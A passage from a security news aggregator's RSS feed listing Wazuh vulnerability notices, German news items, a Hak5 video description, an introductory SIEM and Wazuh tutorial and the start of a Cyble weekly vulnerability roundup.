<guid isPermaLink="true">https://tsecurity.de/de/3475850/sicherheitsluecken/cve-2026-30893-wazuh-up-to-4143-cluster-synchronization-extraction-routine-path-traversal-euvd-2026-26271/</guid>
<pubDate>Wed, 29 Apr 2026 23:38:13 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability labeled as <a href="https://vuldb.com/kb/risk">critical</a> has been found in <a href="https://vuldb.com/product/wazuh">Wazuh up to 4.14.3</a>. This issue affects some unknown processing of the component <em>Cluster Synchronization Extraction Routine</em>. Such manipulation leads to path traversal.

This vulnerability is listed as <a href="https://vuldb.com/cve/CVE-2026-30893">CVE-2026-30893</a>. The attack may be performed from remote. There is no available exploit.

The affected component should be upgraded.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-26204 | Wazuh up to 4.14.3 Alert GetAlertData buffer underflow (GHSA-j4c7-hwjw-8857 / EUVD-2026-26259)]]></title>
<description><![CDATA[A vulnerability, which was classified as problematic, has been found in Wazuh up to 4.14.3. This impacts the function GetAlertData of the component Alert Handler. This manipulation causes buffer underwrite.

This vulnerability appears as CVE-2026-26204. The attack requires local access. There is ...]]></description>
<link>https://tsecurity.de/de/3475848/sicherheitsluecken/cve-2026-26204-wazuh-up-to-4143-alert-getalertdata-buffer-underflow-ghsa-j4c7-hwjw-8857-euvd-2026-26259/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3475848/sicherheitsluecken/cve-2026-26204-wazuh-up-to-4143-alert-getalertdata-buffer-underflow-ghsa-j4c7-hwjw-8857-euvd-2026-26259/</guid>
<pubDate>Wed, 29 Apr 2026 23:38:10 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/kb/risk">problematic</a>, has been found in <a href="https://vuldb.com/product/wazuh">Wazuh up to 4.14.3</a>. This impacts the function <code>GetAlertData</code> of the component <em>Alert Handler</em>. This manipulation causes buffer underwrite.

This vulnerability appears as <a href="https://vuldb.com/cve/CVE-2026-26204">CVE-2026-26204</a>. The attack requires local access. There is no available exploit.

It is advisable to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-28221 | Wazuh up to 4.14.3 print_hex_string stack-based overflow (EUVD-2026-26270)]]></title>
<description><![CDATA[A vulnerability described as critical has been identified in Wazuh up to 4.14.3. The affected element is the function print_hex_string. Executing a manipulation can lead to stack-based buffer overflow.

This vulnerability is registered as CVE-2026-28221. It is possible to launch the attack remote...]]></description>
<link>https://tsecurity.de/de/3475775/sicherheitsluecken/cve-2026-28221-wazuh-up-to-4143-printhexstring-stack-based-overflow-euvd-2026-26270/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3475775/sicherheitsluecken/cve-2026-28221-wazuh-up-to-4143-printhexstring-stack-based-overflow-euvd-2026-26270/</guid>
<pubDate>Wed, 29 Apr 2026 22:51:58 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability described as <a href="https://vuldb.com/kb/risk">critical</a> has been identified in <a href="https://vuldb.com/product/wazuh">Wazuh up to 4.14.3</a>. The affected element is the function <code>print_hex_string</code>. Executing a manipulation can lead to stack-based buffer overflow.

This vulnerability is registered as <a href="https://vuldb.com/cve/CVE-2026-28221">CVE-2026-28221</a>. It is possible to launch the attack remotely. No exploit is available.

Upgrading the affected component is recommended.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-41499 | Wazuh up to 4.14.3 remoted_op.c parse_uname_string buffer underflow (EUVD-2026-26272)]]></title>
<description><![CDATA[A vulnerability classified as problematic has been found in Wazuh up to 4.14.3. The impacted element is the function parse_uname_string of the file remoted_op.c. The manipulation leads to buffer underwrite.

This vulnerability is documented as CVE-2026-41499. The attack can be initiated remotely....]]></description>
<link>https://tsecurity.de/de/3475774/sicherheitsluecken/cve-2026-41499-wazuh-up-to-4143-remotedopc-parseunamestring-buffer-underflow-euvd-2026-26272/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3475774/sicherheitsluecken/cve-2026-41499-wazuh-up-to-4143-remotedopc-parseunamestring-buffer-underflow-euvd-2026-26272/</guid>
<pubDate>Wed, 29 Apr 2026 22:51:57 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability classified as <a href="https://vuldb.com/kb/risk">problematic</a> has been found in <a href="https://vuldb.com/product/wazuh">Wazuh up to 4.14.3</a>. The impacted element is the function <code>parse_uname_string</code> of the file <em>remoted_op.c</em>. The manipulation leads to buffer underwrite.

This vulnerability is documented as <a href="https://vuldb.com/cve/CVE-2026-41499">CVE-2026-41499</a>. The attack can be initiated remotely. There is not any exploit available.

It is recommended to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[IT-Sicherheitsplattform: Anreifer können Wazuh kompromittieren | heise online]]></title>
<description><![CDATA[Alert! IT-Sicherheitsplattform: Anreifer können Wazuh kompromittieren. In der aktuellen Wazuh-Version haben die Entwickler mehrere Schwachstellen ...]]></description>
<link>https://tsecurity.de/de/3474889/it-security-nachrichten/it-sicherheitsplattform-anreifer-koennen-wazuh-kompromittieren-heise-online/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3474889/it-security-nachrichten/it-sicherheitsplattform-anreifer-koennen-wazuh-kompromittieren-heise-online/</guid>
<pubDate>Wed, 29 Apr 2026 17:10:05 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Alert! <b>IT</b>-Sicherheitsplattform: Anreifer können Wazuh kompromittieren. In der aktuellen Wazuh-Version haben die Entwickler mehrere Schwachstellen ...]]></content:encoded>
</item>
<item>
<title><![CDATA[IT-Sicherheitsplattform: Anreifer können Wazuh kompromittieren]]></title>
<description><![CDATA[In der aktuellen Wazu-Version haben die Entwickler mehrere Schwachstellen geschlossen. Es kann Schadcode auf Systeme gelangen.]]></description>
<link>https://tsecurity.de/de/3474482/it-security-nachrichten/it-sicherheitsplattform-anreifer-koennen-wazuh-kompromittieren/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3474482/it-security-nachrichten/it-sicherheitsplattform-anreifer-koennen-wazuh-kompromittieren/</guid>
<pubDate>Wed, 29 Apr 2026 14:37:36 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[In der aktuellen Wazu-Version haben die Entwickler mehrere Schwachstellen geschlossen. Es kann Schadcode auf Systeme gelangen.]]></content:encoded>
</item>
<item>
<title><![CDATA[IT-Sicherheitsplattform: Anreifer können Wazuh kompromittieren]]></title>
<description><![CDATA[In der aktuellen Wazu-Version haben die Entwickler mehrere Schwachstellen geschlossen. Es kann Schadcode auf Systeme gelangen.]]></description>
<link>https://tsecurity.de/de/3474450/it-nachrichten/it-sicherheitsplattform-anreifer-koennen-wazuh-kompromittieren/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3474450/it-nachrichten/it-sicherheitsplattform-anreifer-koennen-wazuh-kompromittieren/</guid>
<pubDate>Wed, 29 Apr 2026 14:32:18 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[In der aktuellen Wazu-Version haben die Entwickler mehrere Schwachstellen geschlossen. Es kann Schadcode auf Systeme gelangen.]]></content:encoded>
</item>
<item>
<title><![CDATA[Wazuh: Kritische Sicherheitslücken bedrohen UNIX-Systeme]]></title>
<description><![CDATA[BERLIN / LONDON (IT BOLTWISE) – Eine neue Sicherheitswarnung des Bundesamts für Sicherheit in der Informationstechnik (BSI) weist auf kritische Schwachstellen in der Open-Source-Software Wazuh hin. Diese Schwachstellen ermöglichen potenziell gefährliche Angriffe auf UNIX-Systeme. Die betroffenen ...]]></description>
<link>https://tsecurity.de/de/3474137/it-security-nachrichten/wazuh-kritische-sicherheitsluecken-bedrohen-unix-systeme/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3474137/it-security-nachrichten/wazuh-kritische-sicherheitsluecken-bedrohen-unix-systeme/</guid>
<pubDate>Wed, 29 Apr 2026 12:52:20 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/04/ai-wazuh-security-alert.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/04/ai-wazuh-security-alert.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/04/ai-wazuh-security-alert-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/04/ai-wazuh-security-alert-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/04/ai-wazuh-security-alert-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/04/ai-wazuh-security-alert-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/04/ai-wazuh-security-alert-120x120.jpg 120w" sizes="(max-width: 1024px) 100vw, 1024px">BERLIN / LONDON (IT BOLTWISE) – Eine neue Sicherheitswarnung des Bundesamts für Sicherheit in der Informationstechnik (BSI) weist auf kritische Schwachstellen in der Open-Source-Software Wazuh hin. Diese Schwachstellen ermöglichen potenziell gefährliche Angriffe auf UNIX-Systeme. Die betroffenen Systeme sollten umgehend aktualisiert werden, um die Risiken zu minimieren. Das Bundesamt für Sicherheit in der Informationstechnik (BSI) hat […]</p>
<div><a href="https://www.it-boltwise.de/wazuh-kritische-sicherheitsluecken-bedrohen-unix-systeme.html">... den vollständigen Artikel <strong>»Wazuh: Kritische Sicherheitslücken bedrohen UNIX-Systeme«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/wazuh-kritische-sicherheitsluecken-bedrohen-unix-systeme.html">Wazuh: Kritische Sicherheitslücken bedrohen UNIX-Systeme</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[[NEU] [hoch] Wazuh: Mehrere Schwachstellen]]></title>
<description><![CDATA[Ein Angreifer kann mehrere Schwachstellen in Wazuh ausnutzen, um einen Denial of Service Angriff durchzuführen, beliebigen Code auszuführen, Daten zu manipulieren, vertrauliche Informationen offenzulegen oder Sicherheitsmaßnahmen zu umgehen.]]></description>
<link>https://tsecurity.de/de/3470809/it-security-nachrichten/neu-hoch-wazuh-mehrere-schwachstellen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3470809/it-security-nachrichten/neu-hoch-wazuh-mehrere-schwachstellen/</guid>
<pubDate>Tue, 28 Apr 2026 12:37:00 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Ein Angreifer kann mehrere Schwachstellen in Wazuh ausnutzen, um einen Denial of Service Angriff durchzuführen, beliebigen Code auszuführen, Daten zu manipulieren, vertrauliche Informationen offenzulegen oder Sicherheitsmaßnahmen zu umgehen.]]></content:encoded>
</item>
<item>
<title><![CDATA[Connecting a Windows Endpoint to Wazuh]]></title>
<description><![CDATA[A step-by-step guide on connecting a Windows endpoint to Wazuh. Learn how to add a Windows agent and collect logs.Continue reading on InfoSec Write-ups »]]></description>
<link>https://tsecurity.de/de/3470285/hacking/connecting-a-windows-endpoint-to-wazuh/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3470285/hacking/connecting-a-windows-endpoint-to-wazuh/</guid>
<pubDate>Tue, 28 Apr 2026 09:21:58 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="medium-feed-item"><p class="medium-feed-image"><a href="https://infosecwriteups.com/connecting-a-windows-endpoint-to-wazuh-e4b21e941f3e"><img src="https://cdn-images-1.medium.com/max/600/1*5t2raAWdeswhKfMcBTUHuw.png" width="600"></a></p><p class="medium-feed-snippet">A step-by-step guide on connecting a Windows endpoint to Wazuh. Learn how to add a Windows agent and collect logs.</p><p class="medium-feed-link"><a href="https://infosecwriteups.com/connecting-a-windows-endpoint-to-wazuh-e4b21e941f3e">Continue reading on InfoSec Write-ups »</a></p></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[There are too many stories to cover! - Threat Wire]]></title>
<description><![CDATA[Author: Hak5 - Bewertung: 42x - Views:244 ⬇️ OPEN FOR LINKS TO ARTICLES TO LEARN MORE ⬇️


@endingwithali →
Twitch: https://twitch.tv/endingwithali
Twitter: https://twitter.com/endingwithali
YouTube: https://youtube.com/@endingwithali
Everywhere else: https://links.ali.dev

Want to work with Ali?...]]></description>
<link>https://tsecurity.de/de/3420958/it-security-video/there-are-too-many-stories-to-cover-threat-wire/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3420958/it-security-video/there-are-too-many-stories-to-cover-threat-wire/</guid>
<pubDate>Thu, 09 Apr 2026 17:32:58 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Hak5 - Bewertung: 42x - Views:244 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/AFns_Mk9pP4?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>⬇️ OPEN FOR LINKS TO ARTICLES TO LEARN MORE ⬇️<br />
<br />
<br />
@endingwithali →<br />
Twitch: https://twitch.tv/endingwithali<br />
Twitter: https://twitter.com/endingwithali<br />
YouTube: https://youtube.com/@endingwithali<br />
Everywhere else: https://links.ali.dev<br />
<br />
Want to work with Ali? hak5@endingwithali.com<br />
<br />
[❗] Join the Patreon→ https://patreon.com/threatwire<br />
00:00  0 - Intro<br />
00:15 1 - Rotate Your Credentials Now<br />
03:16 2 - Browser Bugs<br />
04:27 3 - BSides News<br />
08:03 4 - Comment Section<br />
09:17 5 - Outro<br />
<br />
LINKS<br />
🔗 Story 1: Rotate Your Credentials Now<br />
http://cloud.google.com/blog/topics/threat-intelligence/north-korea-threat-actor-targets-axios-npm-package<br />
https://www.wiz.io/blog/tracking-teampcp-investigating-post-compromise-attacks-seen-in-the-wild<br />
https://vercel.com/changelog/axios-package-compromise-and-remediation-steps<br />
https://socket.dev/blog/axios-npm-package-compromised<br />
https://www.bleepingcomputer.com/news/security/cisco-source-code-stolen-in-trivy-linked-dev-environment-breach/<br />
https://www.trendmicro.com/en_us/research/26/c/axios-npm-package-compromised.html<br />
🔗 Story 2: Browser Bugs<br />
https://www.helpnetsecurity.com/2026/04/01/google-chrome-zero-day-cve-2026-5281/<br />
https://cti.wazuh.com/vulnerabilities/cves/CVE-2026-4688<br />
https://nvd.nist.gov/vuln/detail/CVE-2026-5281<br />
https://nvd.nist.gov/vuln/detail/CVE-2026-4688<br />
🔗 Story 3: BSides News<br />
https://bsides.org/<br />
http://aws.amazon.com/blogs/machine-learning/aws-launches-frontier-agents-for-security-testing-and-cloud-operations/<br />
https://blog.railway.com/p/incident-report-march-30-2026-accidental-cdn-caching<br />
https://x.com/bran_don_gell/status/2038673403880816729<br />
https://blog.calif.io/p/mad-bugs-vim-vs-emacs-vs-claude<br />
https://cybernews.com/privacy/linkedin-surveillance-browsergate/<br />
https://thehackernews.com/2026/04/claude-code-tleaked-via-npm-packaging.html<br />
https://www.securityweek.com/critical-vulnerability-in-claude-code-emerges-days-after-source-leak/<br />
https://x.com/Fried_rice/status/2038894956459290963<br />
https://www.helpnetsecurity.com/2026/03/23/nist-dns-security-guide-sp-800-81r3/<br />
https://www.nist.gov/news-events/news/2026/03/secure-domain-name-system-dns-deployment-guide-final-publication<br />
https://x.com/vxdb/status/2039731126885855732<br />
https://www.bleepingcomputer.com/news/security/claude-ai-finds-vim-emacs-rce-bugs-that-trigger-on-file-open/<br />
-----☆-----☆-----☆-----☆-----☆-----☆-----☆-----☆-----☆-----☆<br />
Our Site → https://www.hak5.org<br />
Shop →  http://hakshop.myshopify.com/<br />
Community → https://www.hak5.org/community<br />
Subscribe → https://www.youtube.com/user/Hak5Darren?sub_confirmation=1<br />
Support → https://www.patreon.com/threatwire<br />
Contact Us → http://www.twitter.com/hak5<br />
____________________________________________<br />
<br />
Founded in 2005, Hak5's mission is to advance the InfoSec industry. We do this through our award winning educational podcasts, leading pentest gear, and inclusive community – where all hackers belong.<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Getting started with Wazuh: Understanding SIEM and Real-Time Security Monitoring]]></title>
<description><![CDATA[Introduction to SIEM and Wazuh: Architecture, Components & Why It MattersEvery second, thousands of cyber attacks happen worldwide. But how do organizations even know they are under attack? This is where SIEM comes into the picture — and tools like Wazuh make it practical.Every organization relie...]]></description>
<link>https://tsecurity.de/de/3407419/hacking/getting-started-with-wazuh-understanding-siem-and-real-time-security-monitoring/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3407419/hacking/getting-started-with-wazuh-understanding-siem-and-real-time-security-monitoring/</guid>
<pubDate>Sat, 04 Apr 2026 12:51:53 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*ypddnU9HdoLmXvdDNoz3Aw.png"></figure><h3>Introduction to SIEM and Wazuh: Architecture, Components &amp; Why It Matters</h3><h4><em>Every second, thousands of cyber attacks happen worldwide. But how do organizations even know they are under attack?<br> This is where SIEM comes into the picture — and tools like Wazuh make it practical.</em></h4><p>Every organization relies on digital systems to perform daily operations. These systems continuously <strong>generate events</strong> — such as logins, file access, software installations, and network connections.</p><p><strong>Each of these events is recorded as a log, creating a digital footprint of everything happening inside the environment.</strong></p><p>Every operating systems such as Windows, Linux/Unix, MacOS, generates logs and stores in a specific location. In Windows, logs can be viewed using the <strong>Event Viewer</strong>, while in Linux systems, they are typically stored in the /var/log directory.</p><p><strong>Reviewing these logs helps us to understand what is going on within the system.</strong> If anything suspicious happens we can identify it.</p><p>However, reviewing logs from multiple systems manually is <strong>time-consuming and inefficient</strong>, especially in <strong>large enterprise environments</strong>.</p><p>As the solution os this problem, we introduce <strong>SIEM (Security Information &amp; Event Management) </strong>Tools. These are the central hub for the log review.</p><h3>SIEM Architecture</h3><p>In this model, agents are <strong>deployed on endpoints</strong> to collect logs and security events. These logs are forwarded to a <strong>central manager</strong>, where correlation rules analyze the data to <strong>detect suspicious patterns or anomalies</strong>.</p><p>Roles of a <strong>SIEM manager</strong>:</p><ul><li>Central <strong>Evnet-Log</strong> Review</li><li>Connect with all <strong>SIEM </strong>agents</li><li><strong>Visualization </strong>of logs and events.</li></ul><p>Roles of a <strong>SIEM agents</strong>:</p><ul><li>Collect logs from system on which the agent is installed.</li><li>Transfer logs from the system to the SIEM manager.</li></ul><h3>Introduction to Wazuh</h3><p>Wazuh is an open-source security platform that combines <strong>SIEM </strong>capabilities with extended detection and response (<strong>XDR</strong>), providing <strong>centralized visibility</strong>, <strong>threat detection</strong>, and <strong>compliance monitoring</strong>.</p><p>We already covered <strong>what is SIEM</strong>, now let’s understand <strong>XDR</strong>.</p><ul><li>It is a tool that collects data from multiple assets such as <strong>endpoints</strong>, <strong>networks, servers, cloud workloads, and emails into a single platform</strong>,</li><li>For improved, real-time threat detection and automated, rapid response.</li><li>It <strong>reduces alert fatigue</strong> and <strong>enhances visibility</strong> across an organization’s entire IT infrastructure.</li></ul><h3>Wazuh Components &amp; Architecture</h3><p>There are mainly 4 components of wazuh</p><ul><li>Wazuh manager (Server)</li><li>Wazuh Indexer</li><li>Wazuh Agent</li><li>Wazuh Dashboard</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*MTX1n50EmqcKWxgM.png"></figure><p>As you can see, in above image,</p><h4>Wazuh Agents</h4><ul><li>They are <strong>installed on endpoint systems</strong>, such as laptops, PCs, workstations, server, Cloud server, Domain Controller, etc.</li><li>They can be installed on cross-platforms such as <strong>windows and linux</strong>.</li><li>They <strong>collects logs</strong> from the endpoint system and <strong>transfers it to the Wazuh manager.</strong></li></ul><h4>Wazuh Manager</h4><ul><li>It is a <strong>central component</strong> responsible for <strong>analysing data collected from Wazuh agents.</strong></li><li>It detects <strong>threats</strong>, <strong>anomalies</strong>, and <strong>regulatory compliance</strong> <strong>violations </strong>in <strong>real time</strong>, <strong>generating alerts</strong> when suspicious activity is identified.</li><li>Beyond detection, the Wazuh server <strong>enables centralized management</strong> by remotely configuring Wazuh agents and <strong>continuously monitoring their operational status.</strong></li></ul><h4>Wazuh Indexer</h4><ul><li>The Wazuh indexer is a <strong>highly scalable</strong>, <strong>full-text search</strong> and <strong>analytics engine.</strong></li><li>This Wazuh central component indexes and stores alerts generated by the Wazuh server.</li><li>It provides near real-time data search and analytics capabilities.</li><li>The Wazuh indexer can be configured as a <strong>single-node</strong> or <strong>multi-node cluster</strong>, providing scalability and high availability.</li></ul><p>An index is a <strong>collection of related documents</strong>. The documents stored in the Wazuh indexer are distributed across different containers known as <strong>shards</strong>.</p><p>By distributing the documents across multiple shards and distributing those shards across various nodes, the Wazuh indexer can ensure <strong>redundancy</strong>. This protects your system against hardware failures and increases query capacity as nodes are added to a cluster.</p><h4>Wazuh Dashboard</h4><ul><li>The Wazuh dashboard is a <strong>flexible </strong>and <strong>intuitive web interface</strong> for <strong>visualizing</strong>, <strong>analyzing</strong>, and <strong>managing security data</strong>.</li><li>It enables users to <strong>investigate events and alerts</strong>, oversee the Wazuh platform, and <strong>enforce role-based access control (RBAC)</strong> and <strong>single sign-on (SSO) policies.</strong></li><li>It includes dashboards for <strong>threat hunting</strong>, <strong>malware detection, file integrity monitoring</strong>, <strong>system inventory</strong>, <strong>and regulatory compliance</strong> (for example, <strong>PCI DSS, GDPR, HIPAA, and NIST 800–53</strong>).</li><li>You can generate reports and create custom <strong>visualizations </strong>and <strong>dashboards</strong>.</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*jBfH1qQRC_kiqvGV.png"></figure><h3>Why Wazuh as First SIEM Tool?</h3><ul><li>Wazuh is <strong>completely free and open-source</strong>, making it ideal for students, researchers, and small organizations.</li><li>It has <strong>active and huge community</strong>.</li><li>Integration with <strong>MITRE ATT&amp;CK framework, good for mapping events with TTPs (Tactics, Techniques and proceduers)</strong>.</li><li>Used for <strong>Endpoint security</strong>, <strong>Threat Intelligence</strong>, Security operations, and <strong>cloud security</strong>.</li><li>It<strong> helps to meet regulatory compliance</strong> <strong>requirements </strong>like <strong>PCI DSS, HIPAA, GDPR, etc.</strong></li><li>It provides a <strong>single dashboard to monitor endpoints</strong>, <strong>cloud instances (AWS, Azure, GCP), and containers.</strong></li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*EWyeLcscMO4Aimgv.png"></figure><h3>Conclusion</h3><p>Understanding SIEM is the first step toward thinking like a <strong>defender</strong>. Installing and configuring Wazuh is the next step.</p><p><strong>Have you ever built your own SIEM lab? </strong>If not, Wazuh might be the perfect place to start.</p><p><strong>Let me know if you would like a detailed installation and lab setup guide in the next article.</strong></p><h3>📌 What’s Next?</h3><ul><li>Installing Wazuh on Linux</li><li>Deploying agents on Windows &amp; Linux</li><li>Simulating attacks and monitoring alerts</li><li>Creating custom detection rules.</li></ul><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=8f29d30c9f70" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/introduction-to-siem-and-wazuh-architecture-components-why-it-matters-8f29d30c9f70">Getting started with Wazuh: Understanding SIEM and Real-Time Security Monitoring</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The Week in Vulnerabilities: AI Frameworks, VMware, and Critical ICS Exposure]]></title>
<description><![CDATA[Cyble Research & Intelligence Labs (CRIL) tracked 1,452 vulnerabilities last week, reflecting the continued expansion of the global attack surface.  


Of these, 222 vulnerabilities have publicly available Proof-of-Concept (PoC) exploits, significantly accelerating the likelihood of exploitation ...]]></description>
<link>https://tsecurity.de/de/3402213/it-security-nachrichten/the-week-in-vulnerabilities-ai-frameworks-vmware-and-critical-ics-exposure/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3402213/it-security-nachrichten/the-week-in-vulnerabilities-ai-frameworks-vmware-and-critical-ics-exposure/</guid>
<pubDate>Thu, 02 Apr 2026 12:06:45 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="800" height="400" src="https://cyble.com/wp-content/uploads/2026/04/Cyble-weekly-vulnerabilities-report-2.webp" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="Cyble weekly vulnerabilities report" decoding="async" srcset="https://cyble.com/wp-content/uploads/2026/04/Cyble-weekly-vulnerabilities-report-2.webp 800w, https://cyble.com/wp-content/uploads/2026/04/Cyble-weekly-vulnerabilities-report-2-300x150.webp 300w, https://cyble.com/wp-content/uploads/2026/04/Cyble-weekly-vulnerabilities-report-2-768x384.webp 768w" sizes="(max-width: 800px) 100vw, 800px" title="The Week in Vulnerabilities: AI Frameworks, VMware, and Critical ICS Exposure 1"></p>
<p><!-- wp:paragraph --></p>
<p>Cyble Research &amp; Intelligence Labs (CRIL) tracked 1,452 vulnerabilities last week, reflecting the continued expansion of the global attack surface.  </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Of these, 222 vulnerabilities have publicly available Proof-of-Concept (PoC) exploits, significantly accelerating the likelihood of exploitation in real-world environments.  </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Additionally, multiple <a href="https://cyble.com/knowledge-hub/10-vulnerability-types-threat-actors/" target="_blank" rel="noreferrer noopener">vulnerabilities</a> surfaced across underground forums, with at least 7 actively discussed exploits, indicating strong adversarial interest and rapid weaponization cycles.  </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>A total of 128 vulnerabilities were rated critical under CVSS v3.1, while 47 were rated critical under CVSS v4.0, highlighting the severity of newly disclosed issues.  </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Furthermore, CISA added 8 vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog, confirming active exploitation in the wild.  </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>On the industrial front, CISA issued 12 ICS advisories covering 150 vulnerabilities, impacting major vendors including FESTO, Schneider Electric, Siemens, and Mitsubishi Electric.  </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading"><strong>The Week’s Top Vulnerabilities</strong> </h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p><strong>CVE-2026-25769 — Wazuh (Critical)</strong> </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>CVE-2026-25769 is a critical remote code execution vulnerability in Wazuh caused by the deserialization of untrusted data in cluster deployments.  </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Attackers with access to a worker node can send malicious serialized payloads to the master node, resulting in remote code execution with root privileges. This enables full compromise of the centralized <a href="https://cyble.com/knowledge-hub/physical-security-monitoring-apac/" target="_blank" rel="noreferrer noopener">security monitoring</a> infrastructure. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><strong>CVE-2026-20131 — Cisco Secure Firewall Management Center (Critical)</strong> </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>CVE-2026-20131 is a maximum-severity vulnerability allowing unauthenticated attackers to execute arbitrary Java code as root on affected systems.  </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The vulnerability is reportedly being exploited by <a href="https://cyble.com/knowledge-hub/what-is-ransomware/" target="_blank" rel="noreferrer noopener">ransomware</a> groups, enabling complete takeover of <a href="https://cyble.com/knowledge-hub/what-is-firewall/" target="_blank" rel="noreferrer noopener">firewall</a> management systems and downstream enterprise networks. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><strong>CVE-2026-4342 — Kubernetes ingress-nginx (High)</strong> </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>CVE-2026-4342 is a configuration injection vulnerability that allows attackers to inject malicious configurations via crafted ingress annotations.  </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Successful exploitation can lead to remote code execution and exposure of Kubernetes secrets, significantly expanding attacker control across containerized environments. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><strong>CVE-2026-22721 — VMware Aria Operations (High)</strong> </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>CVE-2026-22721 is a privilege escalation vulnerability that allows attackers with limited access to elevate privileges to administrative levels.  </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>This enables attackers to manipulate monitoring systems, access sensitive data, and expand control across virtualized infrastructure. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><strong>CVE-2026-33309 — Langflow AI Framework (Critical)</strong> </p>
<p><!-- /wp:paragraph --></p>
